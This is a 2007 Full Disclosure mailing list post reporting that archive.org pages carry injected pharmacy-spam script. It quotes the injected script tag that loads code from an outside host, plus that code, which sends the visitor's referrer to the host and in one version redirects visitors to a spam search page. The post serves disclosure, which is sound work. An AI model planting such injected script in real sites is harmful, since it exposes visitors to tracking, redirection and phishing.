Full Disclosure mailing list archives
www.archive.org <--- XSS (and under attack)
From: wac <waldoalvarez00 () gmail com>
Date: Tue, 25 Sep 2007 04:28:29 -0400
Hello: I could take a while to investigate this more but I have no time ATM (veeery busy) and the website is under attack. (should be a matter to try that script on some form. Get a virtual pass for the library, digg in the book publishing forms and report back) Try this links: http://www.archive.org/details/BuyPhentermineOnline_979 http://www.archive.org/details/BuyPhentermine.noPrescriptionBestPriceFreeDelivery Parts of the HTML follows to help spot the hole ... <a href="/search.php?query=subject:%22 free delivery%22"> free delivery</a></p></div><p xmlns:fo="http://www.w3.org/1999/XSL/Format" class="content" style="text-align:left;"><script language="javascript" src=" http://rico05.com/counter/counter.js?id=950&key=buy+phentermine"></script> ... /--------- counter.js (called directly) ---------/ var ref = escape(document.referrer); document.write('\<script language=\"javascript\" src=\" http://rico05.com/counter/counter.js?ref=' + ref + '\"\>\<\/script\>'); /----- EOF -----/ /--------- counter.js (with referer forged) ---------/ document.location = 'http://rico05.com/search/?said=951&q=buy phentermine'; /----- EOF -----/ And that's it. A lot of money spamming users. Who is said=951? Ask rico05.com if they are not a bunch of phishers should tell you. Regards Waldo Alvarez
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- www.archive.org <--- XSS (and under attack) wac (Sep 25)